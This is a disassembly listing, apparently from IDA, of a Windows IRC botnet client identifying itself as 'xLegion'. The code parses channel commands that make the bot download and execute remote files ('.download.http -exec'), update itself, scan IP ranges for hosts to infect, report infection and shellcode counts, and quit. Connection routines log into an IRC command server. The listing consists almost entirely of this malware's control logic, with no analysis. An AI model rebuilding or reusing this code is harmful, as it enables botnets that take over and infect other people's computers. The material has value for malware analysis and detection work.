flt_4042D4 dd 0.0 ; DATA XREF: sub_404360+2A2�r
flt_4042D8 dd 1.0e-3 ; DATA XREF: sub_404360+296�r
align 10h
dword_4042E0 dd 0FFFFFFFFh, 404B6Ah, 404B6Eh, 0dword_4042F0 dd 0FFFFFFFFh, 404D51h, 404D55h, 0dword_404300 dd 0FFFFFFFFh, 405371h, 405375h, 0dword_404310 dd 0FFFFFFFFh, 408913h, 408917h, 0dword_404320 dd 0FFFFFFFFh, 409156h, 40915Ah, 0dword_404330 dd 0FFFFFFFFh, 4096BEh, 4096C2h, 0dword_404340 dd 0FFFFFFFFh, 409938h, 40993Ch, 0dbl_404350 dq -3.0517578125e-5 ; DATA XREF: sub_409957+2C�r
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404360 proc near ; CODE XREF: code:00405128�p
; code:004052F6�p
var_1E0 = qword ptr -1E0h
var_1D8 = qword ptr -1D8h
var_1D0 = dword ptr -1D0h
var_1CC = byte ptr -1CCh
var_14C = dword ptr -14Ch
var_148 = byte ptr -148h
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4042E0
push offset sub_409A50
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1D0h
push ebx
push esi
push edi
mov [ebp+var_18], esp
wait
and [ebp+var_4], 0
mov esi, offset asc_401614 ; " "
push esi
mov edi, [ebp+arg_0]
push dword ptr [edi+0Ch]
call sub_409A44 ; strtok
pop ecx
pop ecx
mov ebx, eax
mov [ebp+var_9C], ebx
mov [ebp+var_1C], 1
loc_4043B0: ; CODE XREF: sub_404360+73�j
cmp [ebp+var_1C], 20h
jge short loc_4043D5
push esi
push 0
call sub_409A44 ; strtok
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx*4+var_9C], eax
inc [ebp+var_1C]
mov ebx, [ebp+var_9C]
jmp short loc_4043B0
; ---------------------------------------------------------------------------
loc_4043D5: ; CODE XREF: sub_404360+54�j
push offset a_bot_die ; ".bot.die"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4043FF
push offset aQuitGodHatesUs ; "QUIT :god hates us all\r\n"
call sub_404C8D
pop ecx
call dword_40119C ; WSACleanup
push 1
call dword_401084 ; ExitProcess
loc_4043FF: ; CODE XREF: sub_404360+84�j
push offset a_bot_uptime ; ".bot.uptime"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40441A
call sub_4093DC
jmp loc_404AED
; ---------------------------------------------------------------------------
loc_40441A: ; CODE XREF: sub_404360+AE�j
push offset a_bot_os ; ".bot.os"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404435
call sub_4094D4
jmp loc_404AED
; ---------------------------------------------------------------------------
loc_404435: ; CODE XREF: sub_404360+C9�j
push offset a_bot_ip ; ".bot.ip"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404462
push ds:dword_409ECC
call sub_4073A9
pop ecx
push eax
push dword ptr [edi+4]
push dword ptr [edi]
push offset dword_4015A8
jmp loc_404AF8
; ---------------------------------------------------------------------------
loc_404462: ; CODE XREF: sub_404360+E4�j
push offset a_bot_sysinfo ; ".bot.sysinfo"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40447D
call sub_40959B
jmp loc_404AED
; ---------------------------------------------------------------------------
loc_40447D: ; CODE XREF: sub_404360+111�j
push offset a_ftpd_status ; ".ftpd.status"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4044B8
push ds:dword_409F08
movzx eax, ds:word_409D50
push eax
push ds:dword_409ECC
call sub_4073A9
pop ecx
push eax
push dword ptr [edi+4]
push dword ptr [edi]
push offset dword_401538
jmp loc_404B5F
; ---------------------------------------------------------------------------
loc_4044B8: ; CODE XREF: sub_404360+12C�j
push offset a_irc_join ; ".irc.join"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
mov esi, [ebp+var_98]
jnz short loc_4044E1
test esi, esi
jz short loc_4044E1
push esi
push offset aJoinS ; "JOIN %s\r\n"
loc_4044D9: ; CODE XREF: sub_404360+19C�j
call sub_404C8D
pop ecx
jmp short loc_404520
; ---------------------------------------------------------------------------
loc_4044E1: ; CODE XREF: sub_404360+16D�j
; sub_404360+171�j
push offset a_irc_part ; ".irc.part"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4044FE
test esi, esi
jz short loc_4044FE
push esi
push offset aPartS ; "PART %s\r\n"
jmp short loc_4044D9
; ---------------------------------------------------------------------------
loc_4044FE: ; CODE XREF: sub_404360+190�j
; sub_404360+194�j
push offset a_irc_jump ; ".irc.jump"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404526
and ds:byte_409EC8, al
push ds:dword_409F18
call sub_40867A
loc_404520: ; CODE XREF: sub_404360+17F�j
pop ecx
jmp loc_404B67
; ---------------------------------------------------------------------------
loc_404526: ; CODE XREF: sub_404360+1AD�j
push offset a_download_http ; ".download.http"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_4046BD
test esi, esi
jz loc_4046BD
cmp [ebp+var_94], eax
jz loc_4046BD
and byte ptr [ebp+var_A4], al
and byte ptr [ebp+var_AC], al
push offset aExec ; "-exec"
push [ebp+var_90]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40457A
mov byte ptr [ebp+var_A4], 1
jmp short loc_404597
; ---------------------------------------------------------------------------
loc_40457A: ; CODE XREF: sub_404360+20F�j
push offset aUpd ; "-upd"
push [ebp+var_90]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404597
mov byte ptr [ebp+var_AC], 1
loc_404597: ; CODE XREF: sub_404360+218�j
; sub_404360+22E�j
mov ebx, dword_401080
call ebx ; dword_401080
mov [ebp+var_A8], eax
push [ebp+var_AC]
push [ebp+var_A4]
push [ebp+var_94]
push [ebp+var_98]
call sub_40870A
add esp, 10h
mov esi, eax
mov [ebp+var_A0], esi
test esi, esi
jz loc_4046A8
call ebx ; dword_401080
mov [ebp+var_B0], eax
sub eax, [ebp+var_A8]
mov dword ptr [ebp+var_1D8], eax
and dword ptr [ebp+var_1D8+4], 0
fild [ebp+var_1D8]
fmul flt_4042D8
fst [ebp+var_BC]
fcom flt_4042D4
fnstsw ax
sahf
jnz short loc_404617
fstp st
fld1
fst [ebp+var_BC]
loc_404617: ; CODE XREF: sub_404360+2AB�j
mov dword ptr [ebp+var_1E0], esi
and dword ptr [ebp+var_1E0+4], 0
fild [ebp+var_1E0]
fdiv st, st(1)
fst [ebp+var_B4]
fmul flt_4042D0
fstp [ebp+var_B8]
cmp byte ptr [ebp+var_A4], 0
fld [ebp+var_B8]
jnz short loc_404680
call sub_409A90 ; _ftol
push eax
call sub_409A90 ; _ftol
push eax
shr esi, 0Ah
push esi
push [ebp+var_94]
push [ebp+var_98]
push dword ptr [edi+4]
push dword ptr [edi]
push offset dword_401478
loc_404673: ; CODE XREF: sub_404360+346�j
call sub_404C8D
add esp, 20h
jmp loc_404B67
; ---------------------------------------------------------------------------
loc_404680: ; CODE XREF: sub_404360+2EB�j
call sub_409A90 ; _ftol
push eax
call sub_409A90 ; _ftol
push eax
shr esi, 0Ah
push esi
push [ebp+var_94]
push [ebp+var_98]
push dword ptr [edi+4]
push dword ptr [edi]
push offset dword_401408
jmp short loc_404673
; ---------------------------------------------------------------------------
loc_4046A8: ; CODE XREF: sub_404360+26F�j
push [ebp+var_98]
push dword ptr [edi+4]
push dword ptr [edi]
push offset unk_4013D4
jmp loc_404AF8
; ---------------------------------------------------------------------------
loc_4046BD: ; CODE XREF: sub_404360+1D5�j
; sub_404360+1DD�j ...
push offset a_scan_start ; ".scan.start"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40497E
cmp esi, eax
jz loc_404B67
cmp [ebp+var_94], eax
jz loc_404B67
cmp [ebp+var_90], eax
jz loc_404B67
cmp [ebp+var_8C], eax
jz loc_404B67
cmp [ebp+var_88], eax
jz loc_404B67
cmp [ebp+var_84], eax
jz loc_404B67
mov ebx, offset aScanner ; "Scanner"
push ebx
call sub_409783
pop ecx
test eax, eax
jnz loc_404B67
push offset aE ; "-e"
push esi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404782
push 5
push 2
call sub_409957
pop ecx
pop ecx
mov [ebp+var_1C], eax
mov ecx, eax
imul ecx, 2Ch
mov cx, word ptr dword_402F50[ecx]
mov ds:word_409EEC, cx
loc_40475C: ; CODE XREF: sub_404360+470�j
mov ds:dword_409EF0, eax
loc_404761: ; CODE XREF: sub_404360+44A�j
cmp ds:word_409EEC, 0
jnz short loc_4047D7
push dword ptr [edi+4]
push dword ptr [edi]
push offset unk_40137C
call sub_404C8D
add esp, 0Ch
jmp loc_404B67
; ---------------------------------------------------------------------------
loc_404782: ; CODE XREF: sub_404360+3D9�j
push esi
call sub_409A38 ; atoi
pop ecx
mov ds:word_409EEC, ax
and ds:dword_409EF0, 0
and [ebp+var_1C], 0
loc_40479A: ; CODE XREF: sub_404360+475�j
mov eax, [ebp+var_1C]
imul eax, 2Ch
lea esi, dword_402F50[eax]
cmp word ptr [esi], 0
jz short loc_404761
push [ebp+var_98]
lea eax, dword_402F38[eax]
push eax
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4047D2
mov ax, [esi]
mov ds:word_409EEC, ax
mov eax, [ebp+var_1C]
jmp short loc_40475C
; ---------------------------------------------------------------------------
loc_4047D2: ; CODE XREF: sub_404360+462�j
inc [ebp+var_1C]
jmp short loc_40479A
; ---------------------------------------------------------------------------
loc_4047D7: ; CODE XREF: sub_404360+409�j
push offset aS_0 ; "-s"
push [ebp+var_94]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40487E
push 10h
pop eax
call sub_409A60
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_C0], esi
push 10h
push ds:dword_409ECC
call sub_4073A9
pop ecx
push eax
push esi
call sub_409A32 ; strncpy
add esp, 0Ch
mov [ebp+var_C4], esi
test esi, esi
jz loc_404B67
mov eax, offset a_ ; "."
push eax
push eax
push esi
call sub_409A2C ; strstr
pop ecx
pop ecx
inc eax
push eax
call sub_409A2C ; strstr
pop ecx
pop ecx
mov [ebp+var_C8], eax
test eax, eax
jz loc_404B67
and byte ptr [eax+1], 0
push 0
push 0
push esi
push offset aSD_D ; "%s%d.%d"
push 10h
push esi
call sub_409A26 ; _snprintf
add esp, 18h
push esi
call dword_401198 ; inet_addr
mov ds:dword_409EE8, eax
push esi
call sub_409A20 ; free
pop ecx
jmp short loc_4048AC
; ---------------------------------------------------------------------------
loc_40487E: ; CODE XREF: sub_404360+48B�j
push offset asc_401368 ; "-x"
push [ebp+var_94]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40489B
call sub_407381
jmp short loc_4048A7
; ---------------------------------------------------------------------------
loc_40489B: ; CODE XREF: sub_404360+532�j
push [ebp+var_94]
call dword_401198 ; inet_addr
loc_4048A7: ; CODE XREF: sub_404360+539�j
mov ds:dword_409EE8, eax
loc_4048AC: ; CODE XREF: sub_404360+51C�j
push [ebp+var_90]
call sub_409A38 ; atoi
mov ds:dword_409EF8, eax
mov [esp+0Ch+var_C], offset aR_0 ; "-r"
push [ebp+var_8C]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4048DC
and ds:dword_409F00, eax
jmp short loc_404900
; ---------------------------------------------------------------------------
loc_4048DC: ; CODE XREF: sub_404360+572�j
push offset asc_401368 ; "-x"
push [ebp+var_8C]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_404B67
mov ds:dword_409F00, 1
loc_404900: ; CODE XREF: sub_404360+57A�j
push [ebp+var_88]
call sub_409A38 ; atoi
pop ecx
mov ds:dword_409EFC, eax
test eax, eax
jge short loc_40491A
mov eax, 80h
loc_40491A: ; CODE XREF: sub_404360+5B3�j
mov ds:dword_409EFC, eax
mov ecx, 1002h
cmp eax, ecx
jle short loc_40492A
mov eax, ecx
loc_40492A: ; CODE XREF: sub_404360+5C6�j
mov ds:dword_409EFC, eax
push [ebp+var_84]
call sub_409A38 ; atoi
pop ecx
mov ds:dword_409EF4, eax
and ds:byte_409F04, 0
cmp [ebp+var_80], 0
jz short loc_404967
push offset asc_401360 ; "-l"
push [ebp+var_80]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404967
mov ds:byte_409F04, 1
loc_404967: ; CODE XREF: sub_404360+5EB�j
; sub_404360+5FE�j
push ebx
push 1
push offset dword_409EE8
push offset loc_4074FC
call sub_40960A
jmp loc_404AFD
; ---------------------------------------------------------------------------
loc_40497E: ; CODE XREF: sub_404360+36C�j
push offset a_scan_current ; ".scan.current"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4049BE
push offset aScanner ; "Scanner"
call sub_409783
pop ecx
test eax, eax
jz loc_404B67
push ds:dword_409D48
call sub_4073A9
pop ecx
push eax
push dword ptr [edi+4]
push dword ptr [edi]
push offset dword_401314
jmp loc_404AF8
; ---------------------------------------------------------------------------
loc_4049BE: ; CODE XREF: sub_404360+62D�j
push offset a_scan_stop ; ".scan.stop"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404A2E
mov ebx, offset aScanner ; "Scanner"
push ebx
call sub_409783
pop ecx
test eax, eax
jz loc_404B67
and ds:byte_409ED0, 0
push 1388h
call dword_40107C ; Sleep
push ebx
call sub_409783
push eax
call sub_40971A
push ds:dword_409D48
call sub_4073A9
add esp, 0Ch
push eax
push dword ptr [edi+4]
push dword ptr [edi]
push offset dword_4012D0
call sub_404C8D
add esp, 10h
and ds:dword_409D48, 0
jmp loc_404B67
; ---------------------------------------------------------------------------
loc_404A2E: ; CODE XREF: sub_404360+66D�j
push offset a_scan_infected ; ".scan.infected"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_404B02
xor ebx, ebx
mov [ebp+var_14C], ebx
push offset dword_4012AC
mov esi, 80h
push esi
lea eax, [ebp+var_148]
push eax
call sub_409A26 ; _snprintf
add esp, 0Ch
mov [ebp+var_1C], ebx
loc_404A68: ; CODE XREF: sub_404360+756�j
mov eax, [ebp+var_1C]
imul eax, 2Ch
cmp word ptr dword_402F50[eax], bx
jz short loc_404AB8
mov ecx, dword_402F58[eax]
add [ebp+var_14C], ecx
push off_402F4C[eax]
push ecx
push offset dword_40129C
push esi
lea eax, [ebp+var_1CC]
push eax
call sub_409A26 ; _snprintf
push esi
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_148]
push eax
call sub_409A1A ; strncat
add esp, 20h
inc [ebp+var_1C]
jmp short loc_404A68
; ---------------------------------------------------------------------------
loc_404AB8: ; CODE XREF: sub_404360+715�j
push [ebp+var_14C]
push offset dword_401284
push esi
lea eax, [ebp+var_1CC]
push eax
call sub_409A26 ; _snprintf
push esi
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_148]
push eax
call sub_409A1A ; strncat
add esp, 1Ch
lea eax, [ebp+var_148]
loc_404AED: ; CODE XREF: sub_404360+B5�j
; sub_404360+D0�j ...
push eax
push dword ptr [edi+4]
push dword ptr [edi]
push offset aSSS ; "%s %s :%s\r\n"
loc_404AF8: ; CODE XREF: sub_404360+FD�j
; sub_404360+358�j ...
call sub_404C8D
loc_404AFD: ; CODE XREF: sub_404360+619�j
add esp, 10h
jmp short loc_404B67
; ---------------------------------------------------------------------------
loc_404B02: ; CODE XREF: sub_404360+6DD�j
push offset a_shellcode_sta ; ".shellcode.status"
push ebx
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404B67
xor ecx, ecx
mov [ebp+var_1D0], ecx
and [ebp+var_1C], ecx
loc_404B1E: ; CODE XREF: sub_404360+7DD�j
mov eax, [ebp+var_1C]
imul eax, 2Ch
cmp word ptr dword_402F50[eax], 0
jz short loc_404B3F
add ecx, dword_402F58[eax]
mov [ebp+var_1D0], ecx
inc [ebp+var_1C]
jmp short loc_404B1E
; ---------------------------------------------------------------------------
loc_404B3F: ; CODE XREF: sub_404360+7CC�j
push ecx
movzx eax, ds:word_409ED2
push eax
push ds:dword_409ECC
call sub_4073A9
pop ecx
push eax
push dword ptr [edi+4]
push dword ptr [edi]
push offset dword_401210
loc_404B5F: ; CODE XREF: sub_404360+153�j
call sub_404C8D
add esp, 18h
loc_404B67: ; CODE XREF: sub_404360+1C1�j
; sub_404360+31B�j ...
wait
jmp short loc_404B71
; ---------------------------------------------------------------------------
dw 16Ah
dd 658BC358h
db 0E8h
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_404360+808�j
or [ebp+var_4], 0FFFFFFFFh
lea esp, [ebp-1ECh]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_404360 endp
; ---------------------------------------------------------------------------
dw 8B56h
dd 33082474h, 840E8AC0h, 801174C9h, 10740DF9h, 740AF980h
dd 304C8A0Bh, 0EBEB4001h, 0C35EC603h, 8DC93357h, 148A303Ch
dd 0DFA800Fh, 0FA800574h, 8007750Ah, 41000F24h, 0C103ECEBh
dd 5EC6035Fh, 5C8B53C3h, 57560824h, 8B003B80h, 571B74FBh
dd 0FFFFA9E8h, 59F08BFFh, 0E74F685h, 2E0E857h, 3E800000h
dd 0FE8B5900h, 0E853E575h, 4E24h, 5B5E5F59h
db 0C3h
aSuvw db 'SUVW',0 ; DATA XREF: sub_404D6D+8B�o
db 4
dd 0F6330000h, 4E8AE856h, 0C0850000h, 8B5E7459h, 14E8DF3h
dd 73E85051h, 8B00004Eh, 0FF8559F8h, 6A4A7459h, 37848D00h
dd 0FFFFFC00h, 35FF5053h, 409F18h, 11A415FFh, 0E88B0040h
dd 2D74ED85h, 75FFFD83h, 0A015FF0Dh, 3D004011h, 2738h
dd 48D1B75h, 0A4805737h, 0FFFC0028h, 62E800FFh, 57FFFFFFh
dd 4DAFE8h, 0EB595900h, 0C258095h, 409Fh, 1F5E8h, 0FF006A00h
dd 40108815h, 5D5E5F00h
db 5Bh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C8D proc near ; CODE XREF: sub_404360+8B�p
; sub_404360:loc_4044D9�p ...
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4042F0
push offset sub_409A50
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
mov [ebp+var_4], edi
lea eax, [ebp+arg_4]
mov [ebp+var_21C], eax
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_218]
push eax
call sub_409AA8 ; vsprintf
add esp, 0Ch
mov [ebp+var_21C], edi
mov esi, dword_401080
call esi ; dword_401080
mov ecx, eax
sub ecx, ds:dword_409F14
mov eax, 3E8h
cmp ecx, eax
ja short loc_404D00
push eax
call dword_40107C ; Sleep
loc_404D00: ; CODE XREF: sub_404C8D+6A�j
call esi ; dword_401080
mov ds:dword_409F14, eax
or esi, 0FFFFFFFFh
cmp ds:dword_409F18, esi
jz short loc_404D38
push edi
lea eax, [ebp+var_218]
push eax
call sub_409AA2 ; strlen
pop ecx
push eax
lea eax, [ebp+var_218]
push eax
push ds:dword_409F18
call dword_4011A8 ; send
test eax, eax
jnz short loc_404D3F
loc_404D38: ; CODE XREF: sub_404C8D+83�j
mov [ebp+var_4], esi
xor al, al
jmp short loc_404D5E
; ---------------------------------------------------------------------------
loc_404D3F: ; CODE XREF: sub_404C8D+A9�j
lea eax, [ebp+var_218]
push eax
call sub_409A20 ; free
pop ecx
mov [ebp+var_4], esi
jmp short loc_404D5C
; ---------------------------------------------------------------------------
db 6Ah, 1, 58h
dd 0E8658BC3h, 0FFFC4D83h
; ---------------------------------------------------------------------------
loc_404D5C: ; CODE XREF: sub_404C8D+C2�j
mov al, 1
loc_404D5E: ; CODE XREF: sub_404C8D+B0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_404C8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D6D proc near ; CODE XREF: sub_404E76+48�p
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 114h
push esi
mov esi, [ebp+arg_0]
imul esi, 1Ch
push off_4016C8[esi]
call sub_4091CA
test eax, eax
pop ecx
jz loc_404E66
push 6
push 1
push 2
call dword_4011B4 ; socket
test eax, eax
mov ds:dword_409F18, eax
jz loc_404E66
push off_4016C8[esi]
call sub_4091CA
pop ecx
push eax
call dword_401198 ; inet_addr
mov [ebp+var_C], eax
mov ax, word_4016CC[esi]
push eax
mov [ebp+var_10], 2
call dword_4011B0 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push ds:dword_409F18
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_404E66
push offset aIrcread ; "IrcRead"
push 1
push 0
push offset aSuvw ; "SUVW"
call sub_40960A
add esp, 10h
test eax, eax
jz short loc_404E66
push off_4016D0[esi]
lea esi, off_4016D0[esi]
call sub_409AA2 ; strlen
test eax, eax
pop ecx
jz short loc_404E2D
push dword ptr [esi]
push offset aPassS ; "PASS %s\r\n"
call sub_404C8D
pop ecx
pop ecx
loc_404E2D: ; CODE XREF: sub_404D6D+B0�j
mov eax, ds:dword_409F10
push eax
push offset aXlegion0x029 ; "xLegion/0x029"
push eax
push eax
push eax
push offset aUserSSSSNickS ; "USER %s %s %s :%s\r\nNICK %s\r\n"
call sub_404C8D
add esp, 18h
lea eax, [ebp+var_114]
push 0
push 104h
push eax
push ds:dword_409F18
call dword_4011A4 ; recv
test eax, eax
jnz short loc_404E6A
loc_404E66: ; CODE XREF: sub_404D6D+1E�j
; sub_404D6D+37�j ...
xor al, al
jmp short loc_404E73
; ---------------------------------------------------------------------------
loc_404E6A: ; CODE XREF: sub_404D6D+F7�j
mov ds:byte_409F0C, 1
mov al, 1
loc_404E73: ; CODE XREF: sub_404D6D+FB�j
pop esi
leave
retn
sub_404D6D endp
; =============== S U B R O U T I N E =======================================
sub_404E76 proc near ; CODE XREF: sub_409022:loc_4090B7�p
push ebx
xor ebx, ebx
loc_404E79: ; CODE XREF: sub_404E76+52�j
cmp ds:byte_409F0C, bl
jnz short loc_404ECA
cmp dword_40397C, 0Bh
jb short loc_404E92
mov dword_40397C, ebx
jmp short loc_404E98
; ---------------------------------------------------------------------------
loc_404E92: ; CODE XREF: sub_404E76+12�j
inc dword_40397C
loc_404E98: ; CODE XREF: sub_404E76+1A�j
push 0Ah
push 4
call sub_409957
push eax
call sub_4098BE
push dword_40397C
mov ds:dword_409F10, eax
mov ds:byte_409F0C, bl
mov ds:byte_409EC8, bl
call sub_404D6D
add esp, 10h
test al, al
jz short loc_404E79
loc_404ECA: ; CODE XREF: sub_404E76+9�j
mov al, 1
pop ebx
retn
sub_404E76 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404300
push offset sub_409A50
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 3B4h
push ebx
push esi
push edi
mov [ebp-18h], esp
and dword ptr [ebp-4], 0
mov edi, [ebp+8]
push edi
call sub_409AA2 ; strlen
pop ecx
add eax, 4
and al, 0FCh
call sub_409A60
mov [ebp-18h], esp
mov esi, esp
mov [ebp-1B4h], esi
test esi, esi
jz loc_405368
push edi
call sub_409AA2 ; strlen
inc eax
push eax
lea eax, [edi+1]
push eax
push esi
call sub_409A32 ; strncpy
mov ebx, offset asc_401614 ; " "
push ebx
push edi
call sub_409A44 ; strtok
add esp, 18h
mov [ebp-0B0h], eax
mov dword ptr [ebp-2Ch], 1
loc_404F50: ; CODE XREF: code:00404F6D�j
cmp dword ptr [ebp-2Ch], 20h
jge short loc_404F6F
push ebx
push 0
call sub_409A44 ; strtok
pop ecx
pop ecx
mov ecx, [ebp-2Ch]
mov [ebp+ecx*4-0B0h], eax
inc dword ptr [ebp-2Ch]
jmp short loc_404F50
; ---------------------------------------------------------------------------
loc_404F6F: ; CODE XREF: code:00404F54�j
push offset aPing ; "PING"
push dword ptr [ebp-0B0h]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404F9A
push dword ptr [ebp-0ACh]
push offset aPongS ; "PONG %s\r\n"
call sub_404C8D
jmp loc_4052FB
; ---------------------------------------------------------------------------
loc_404F9A: ; CODE XREF: code:00404F83�j
push offset aKick ; "KICK"
mov edi, [ebp-0ACh]
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404FF6
mov eax, dword_40397C
imul eax, 1Ch
push off_4016D4[eax]
push dword ptr [ebp-0A8h]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404FF6
mov eax, dword_40397C
imul eax, 1Ch
push off_4016D8[eax]
push off_4016D4[eax]
push offset aJoinSS ; "JOIN %s %s\r\n"
call sub_404C8D
add esp, 0Ch
jmp loc_405368
; ---------------------------------------------------------------------------
loc_404FF6: ; CODE XREF: code:00404FAF�j
; code:00404FCE�j
push offset a432 ; "432"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40533B
push offset a433 ; "433"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40533B
push offset a451 ; "451"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40533B
push offset a001 ; "001"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40530D
push offset a422 ; "422"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40530D
push offset a009 ; "009"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_40530D
push offset a436 ; "436"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_4052FF
push offset a436 ; "436"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_4052FF
push offset a465 ; "465"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_4052FF
push offset aError ; "ERROR"
push dword ptr [ebp-0B0h]
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jz loc_4052FF
push offset a332 ; "332"
push edi
call sub_409A3E ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_405132
push offset asc_40191C ; " :"
push esi
call sub_409A2C ; strstr
pop ecx
pop ecx
sub eax, esi
mov [ebp-30h], eax
cmp eax, 1
jl loc_405368
lea eax, [eax+esi+2]
mov [ebp-3B8h], eax
mov eax, dword_40397C
imul eax, 1Ch
mov eax, off_4016D4[eax]
mov [ebp-3C0h], eax
mov dword ptr [ebp-3C4h], offset aPrivmsg ; "PRIVMSG"
lea eax, [ebp-3C4h]
push eax
call sub_404360
jmp loc_4052FC
; ---------------------------------------------------------------------------
loc_405132: ; CODE XREF: code:004050DC�j
mov [ebp-28h], edi
mov eax, [ebp-0A8h]
mov [ebp-24h], eax
mov edi, 100h
push edi
push 0
lea eax, [ebp-2B4h]
push eax
call sub_409AB4 ; memset
push edi
push 0
lea eax, [ebp-3B4h]
push eax
call sub_409AB4 ; memset
push edi
push 0
lea eax, [ebp-1B0h]
push eax
call sub_409AB4 ; memset
push offset asc_401910 ; "!"
push esi
call sub_409A2C ; strstr
add esp, 2Ch
mov edi, eax
sub edi, esi
mov [ebp-30h], edi
cmp edi, 1
jl loc_405368
push edi
push esi
lea eax, [ebp-2B4h]
push eax
call sub_409A32 ; strncpy
lea esi, [esi+edi+1]
mov [ebp-1B4h], esi
push offset a@_0 ; "@"
push esi
call sub_409A2C ; strstr
add esp, 14h
sub eax, esi
mov [ebp-30h], eax
cmp eax, 1
jl loc_405368
lea esi, [esi+eax+1]
mov [ebp-1B4h], esi
push ebx
push esi
call sub_409A2C ; strstr
pop ecx
pop ecx
mov edi, eax
sub edi, esi
mov [ebp-30h], edi
cmp edi, 1
jl loc_405368
push edi
push esi
lea eax, [ebp-3B4h]
push eax
